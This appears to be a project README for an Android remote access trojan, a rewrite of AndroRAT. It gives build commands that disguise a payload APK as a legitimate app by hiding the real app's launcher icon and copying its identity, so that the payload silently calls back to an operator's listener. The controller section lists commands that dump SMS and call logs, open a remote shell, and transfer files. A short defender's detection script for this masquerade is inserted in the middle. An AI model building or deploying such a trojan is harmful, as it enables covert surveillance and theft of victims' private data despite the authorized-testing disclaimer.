A modern rewrite of AndroRAT by karma9874, rebuilt from scratch to actually work on modern Android (tested up to Android 17). The original project stopped functioning reliably on newer Android releases due to major permission and API changes. Tested with Galaxy S25 Ultra.
It is not an exact clone of the original. METAvas is designed for situations where the user intentionally installs and uses the payload APK on their own device or within an authorized testing environment.
What happens step by step
- Decodes the target APK using apktool
- Extracts the app name, icon, package name, and main activity from the manifest
- Removes the LAUNCHER intent category from the target app so it no longer appears on the home screen after installation
- Rebuilds and signs the modified target
- Copies the base payload smali, injects your IP/port, and patches it to launch the real app when opened
- Replaces the payload icon and label with the ones extracted from the target app
- Builds and signs the final payload as out/metavas_launcher.apk
For authorized security research and penetration testing on devices you own or have written permission to test. Don't be stupid with this.
- Linux (tested on Ubuntu/Arch Linux and other Linux distros)
- Java 11+
- aapt2 (from Android build tools)
- Python 3.8+ (for the controller)
```bash
bash metavas.sh -i <YOUR_IP> -p <PORT> -t <path/to/target.apk>
```

Example:

```bash
bash metavas.sh -i 192.168.1.10 -p 4444 -t ~/Downloads/someapp.apk
```

You end up with two APKs in out/:
| File | What it is |
|---|---|
| `<pkg>_hidden.apk` | The real app, with its launcher icon removed |
| `metavas_launcher.apk` | The payload, wearing the real app's identity |
Install both on the device. The payload opens, silently launches the hidden real app, and calls back to your listener.
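A defender's check for the two-APK layout described above, as an added example that is not part of the METAvas project: given decoded manifests (for instance apktool output) keyed by package name, it flags pairs where one package has no launcher entry and another launchable package carries the same label. The package names and manifests are constructed, and it assumes labels are literal text rather than `@string/` references.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

def has_launcher_entry(manifest_xml):
    """True if an activity or alias declares MAIN + LAUNCHER in one intent-filter."""
    for comp in ET.fromstring(manifest_xml).iter():
        if comp.tag not in ("activity", "activity-alias"):
            continue
        for flt in comp.findall("intent-filter"):
            actions = {a.get(NS + "name") for a in flt.findall("action")}
            cats = {c.get(NS + "name") for c in flt.findall("category")}
            if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in cats:
                return True
    return False

def app_label(manifest_xml):
    """Application label as written in the manifest (assumed already resolved to text)."""
    app = ET.fromstring(manifest_xml).find("application")
    return app.get(NS + "label", "") if app is not None else ""

def find_masquerade_pairs(manifests):
    """Return (hidden_pkg, visible_pkg) pairs sharing a label where only the second is launchable."""
    by_label = defaultdict(list)
    for pkg, xml in manifests.items():
        by_label[app_label(xml)].append((pkg, has_launcher_entry(xml)))
    pairs = []
    for label, apps in by_label.items():
        hidden = sorted(p for p, visible in apps if not visible)
        shown = sorted(p for p, visible in apps if visible)
        if label:  # unlabeled packages cannot be matched on identity
            pairs += [(h, s) for h in hidden for s in shown]
    return pairs

def _sample(pkg, label, launcher):
    """Build a constructed manifest for the demo; not taken from any real app."""
    cat = '<category android:name="android.intent.category.LAUNCHER"/>' if launcher else ""
    return (f'<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="{pkg}">'
            f'<application android:label="{label}"><activity android:name=".Main"><intent-filter>'
            f'<action android:name="android.intent.action.MAIN"/>{cat}'
            f'</intent-filter></activity></application></manifest>')

SAMPLE = {pkg: _sample(pkg, label, launcher) for pkg, label, launcher in [
    ("com.example.notes", "Notes", False),   # original app, launcher category stripped
    ("com.example.stub", "Notes", True),     # second package reusing the same label
    ("com.example.maps", "Maps", True)]}     # unrelated, normal app

print(find_masquerade_pairs(SAMPLE))
```

Packages with no launcher entry are common (services, plugins), which is why the check requires a launchable twin with the same label before flagging.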
Usage
```bash
pip install -r requirements.txt
python3 control.py -i <YOUR_IP> -p <PORT>
```

Start the listener before or after the device connects — it will wait.

```bash
python3 control.py -i 0.0.0.0 -p 4444
```

Bind to a specific interface instead of all:

```bash
python3 control.py -i 192.168.1.10 -p 4444
```

Once the device connects you get a prompt:

```
METAVERSE:/>
```
| Command | What it does |
|---|---|
| `deviceInfo` | Basic device info (model, Android version, etc.) |
| `getSMS inbox` | Dumps inbox SMS to a timestamped file in Dumps/ |
| `getSMS sent` | Same for sent messages |
| `getCallLogs` | Dumps call history to Dumps/ |
| `getIP` | Returns the device's IP address |
| `shell` | Drops into an interactive shell on the device |
| `help` | Shows the command list |
| `clear` | Clears your terminal |
| `exit` | Closes the connection |
Inside shell you get a proper interactive prompt (android@shell:~$). You can also push and pull files:
```
android@shell:~$ pull /sdcard/somefile.txt   # downloads to Dumps/
android@shell:~$ push localfile.txt          # uploads to /sdcard/temp/
```
All dumped files go into a Dumps/ folder in the directory you ran control.py from, named by type and timestamp.
This project is licensed under the terms of the GNU General Public License v3.0. External dependencies might be distributed under a different license, such as:
- apktool, licensed under the Apache License 2.0
- platform_build (signapk), licensed under the Apache License 2.0
- Original Payload APK — karma9874
- METAvas and initial ideas — Sameer Al Sahab